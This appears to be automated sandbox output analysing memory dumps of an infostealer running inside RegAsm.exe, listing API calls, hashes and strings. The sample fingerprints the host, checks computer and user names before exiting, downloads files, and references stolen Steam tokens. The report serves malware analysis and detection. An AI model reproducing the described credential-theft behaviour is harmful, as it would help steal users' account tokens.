                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3183270410-0
                                                                                                                                                                                                                                        • Opcode ID: 4989c77146abbc5ee76c948889740fc30d2da5c3921abf62d6455a5f4ed49132
                                                                                                                                                                                                                                        • Instruction ID: 660ba3e5b87f2d6f46484b434598976fca83c63f4e6e6eb2b951d01fded5b4af
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4989c77146abbc5ee76c948889740fc30d2da5c3921abf62d6455a5f4ed49132
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AAF0273560112867D720AB44CC05FDE77689F05700F000194FF48AB2D0DBB05EC487D4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,014532B8,0041887F), ref: 004102CC
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,014532B8,0041887F), ref: 004102D3
                                                                                                                                                                                                                                        • GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4203777966-0
                                                                                                                                                                                                                                        • Opcode ID: 00f558dfb3a4b80afd8e40931e88319d94c69cb643d845e7bfdafbd5d6e961f5
                                                                                                                                                                                                                                        • Instruction ID: 406b522a559848795045bf452203491930279dbdd2025bb65e998ac759834946
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00f558dfb3a4b80afd8e40931e88319d94c69cb643d845e7bfdafbd5d6e961f5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68E08CB5741229ABD3109BE9AC0DBDBBAEDDB06B51F501196BB04D3240EAF08D0087E8
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 004102C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,014532B8,0041887F), ref: 004102CC
                                                                                                                                                                                                                                          • Part of subcall function 004102C0: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,014532B8,0041887F), ref: 004102D3
                                                                                                                                                                                                                                          • Part of subcall function 004102C0: GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7
                                                                                                                                                                                                                                        • strcmp.MSVCRT ref: 0040105C
                                                                                                                                                                                                                                          • Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 0041028C
                                                                                                                                                                                                                                          • Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 00410293
                                                                                                                                                                                                                                          • Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,014532E8), ref: 004102A7
                                                                                                                                                                                                                                        • strcmp.MSVCRT ref: 00401075
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401082
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocNamestrcmp$ComputerExitUser
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2098570390-0
                                                                                                                                                                                                                                        • Opcode ID: 62a4c53fcb9bf593e476f24c714467af4436e90a2949d6c67d663f3053a85b1f
                                                                                                                                                                                                                                        • Instruction ID: 0e87048c4c810025046b2ff71762e49e4161a917b2b12ba1ada2c112072a28c4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62a4c53fcb9bf593e476f24c714467af4436e90a2949d6c67d663f3053a85b1f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5ED05BB1D0020256CF1077725D59A57229D9E11316740052FF840D7151F53DDCC4C27D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,01461F20,?,00428574,?,?,00000000,01462100,00000000,?,01461618,?,00428570), ref: 004131EA
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 00405850: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004058B5
                                                                                                                                                                                                                                          • Part of subcall function 00405850: StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,0000000D), ref: 004058ED
                                                                                                                                                                                                                                          • Part of subcall function 00405850: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405912
                                                                                                                                                                                                                                          • Part of subcall function 00405850: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000D), ref: 00405935
                                                                                                                                                                                                                                          • Part of subcall function 00405850: InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 0040594E
                                                                                                                                                                                                                                          • Part of subcall function 00405850: WriteFile.KERNEL32(00000000,?,000000FF,004203D8,00000000,?,?,?,?,?,?,0000000D), ref: 0040596E
                                                                                                                                                                                                                                          • Part of subcall function 00405850: InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405998
                                                                                                                                                                                                                                          • Part of subcall function 00405850: CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000D), ref: 004059B4
                                                                                                                                                                                                                                          • Part of subcall function 00405850: InternetCloseHandle.WININET(00000000), ref: 004059BB
                                                                                                                                                                                                                                          • Part of subcall function 00405850: InternetCloseHandle.WININET(00000000), ref: 004059C2
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Internet$lstrcpy$File$CloseHandle$CreateOpenReadlstrcat$DirectoryWritelstrlen
                                                                                                                                                                                                                                        • String ID: F
                                                                                                                                                                                                                                        • API String ID: 3336520604-1304234792
                                                                                                                                                                                                                                        • Opcode ID: 64933d0dfc4c3c513359294a403d82db5c53117708ef4ed9c4664b0891a92b25
                                                                                                                                                                                                                                        • Instruction ID: c04eb2c2e67ebdd07284bf2178d9f41eb0a15058c49e10529a03e517fbc21d46
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64933d0dfc4c3c513359294a403d82db5c53117708ef4ed9c4664b0891a92b25
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6626D70805288EACB15E7E5C951BDDBBB85F19308F1480AEE54573282DF781B4CCBBA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,?,00000040,6k@,?,?,?,?,00406B36), ref: 00406A55
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                                                        • String ID: 6k@
                                                                                                                                                                                                                                        • API String ID: 544645111-796046284
                                                                                                                                                                                                                                        • Opcode ID: 3cd70f51d592b6cc45cf5fa41d2a0a34811b31e58a1e5b5358e74f1d35610851
                                                                                                                                                                                                                                        • Instruction ID: 3aa464cb03e6a5daef80767049aabb5e2f81a0e8360af49d45380e9ae7790c68
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cd70f51d592b6cc45cf5fa41d2a0a34811b31e58a1e5b5358e74f1d35610851
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D211C6717141149FD724EF5CD8807A5F3D5FB0A300F51853AF94AE7280D639AC619B99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                        • String ID: ?{B
                                                                                                                                                                                                                                        • API String ID: 1699248803-2221931326
                                                                                                                                                                                                                                        • Opcode ID: e79796351f89c84eeedae8a54d9f090e4875ca2003630773c6d08024e9c7cace
                                                                                                                                                                                                                                        • Instruction ID: a4db74e52ac5736c466cc754061609f1f71d2f4092c2171fd08521da563084ac
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e79796351f89c84eeedae8a54d9f090e4875ca2003630773c6d08024e9c7cace
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7F08231A1015CABDB10DB58DC51B9EB7FDDB44715F1042A6B908A32C0D6706F0A8B94
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                        • String ID: J@
                                                                                                                                                                                                                                        • API String ID: 3188754299-3016281811
                                                                                                                                                                                                                                        • Opcode ID: d8f784d34889ff53bad89def2e75e44130d81317278a711d09a1317144491cd1
                                                                                                                                                                                                                                        • Instruction ID: cb1ed88cae5c2bc93b3530c0dbec5c822ac86073251ab52e185eaeaf3754e9f1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8f784d34889ff53bad89def2e75e44130d81317278a711d09a1317144491cd1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57F08271904658ABCB10DF58D901B99B768EB09B34F20476AFC35937D0C73D5A4086C4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProfilelstrcpy
                                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                                        • API String ID: 2831436455-1654365787
                                                                                                                                                                                                                                        • Opcode ID: 19b3602f314757e0faabd27852db01908b64834fb2260b4e9b2713c893113fbd
                                                                                                                                                                                                                                        • Instruction ID: bd33c02f77d4a78c5fd75930b30a6426299f1aaef28d0e4199fa1c9ffb468557
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19b3602f314757e0faabd27852db01908b64834fb2260b4e9b2713c893113fbd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95E09232B0112857CB20AA98EC017EEB3ADDB48615F40017EFD0CD3281DE64591987D9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • failed memory resize %u to %u bytes, xrefs: 19C70558
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                                        • API String ID: 0-2134078882
                                                                                                                                                                                                                                        • Opcode ID: 7e99ce0c9884b9bf3f24b7511bd8d7591efcff3929291d0bd05a29b973df6a9d
                                                                                                                                                                                                                                        • Instruction ID: 05e6ce081457b17b9ffdd0fb23f9c6877210e3c695989f4295689cfc94fad9cc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e99ce0c9884b9bf3f24b7511bd8d7591efcff3929291d0bd05a29b973df6a9d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06D02B3AF4C2107FDB011A40FC02A8E7B928B50530F1DC524FCDC12210D632992053C3
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • failed to allocate %u bytes of memory, xrefs: 19C704E7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                        • API String ID: 0-1168259600
                                                                                                                                                                                                                                        • Opcode ID: c3924c2f78941032d7cdaf32c2876a51cbc8c4e71d0c84a6915552d9b8b0b35b
                                                                                                                                                                                                                                        • Instruction ID: 8d5e4f70e915d2c47c9589f43e18b07264b457e793b825c557cff9c1582f8344
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3924c2f78941032d7cdaf32c2876a51cbc8c4e71d0c84a6915552d9b8b0b35b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1D0122AF8C32263D6521190FC01ECA7E815BA05A1F1D9034FDCC6A260D965A85187D2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,0042839F,?,00000000,00422B08,000000FF,?,00418576,?), ref: 00415847
                                                                                                                                                                                                                                          • Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
                                                                                                                                                                                                                                          • Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
                                                                                                                                                                                                                                          • Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Soft\Steam\steam_tokens.txt, xrefs: 0041585F
                                                                                                                                                                                                                                        Memory Dump Source
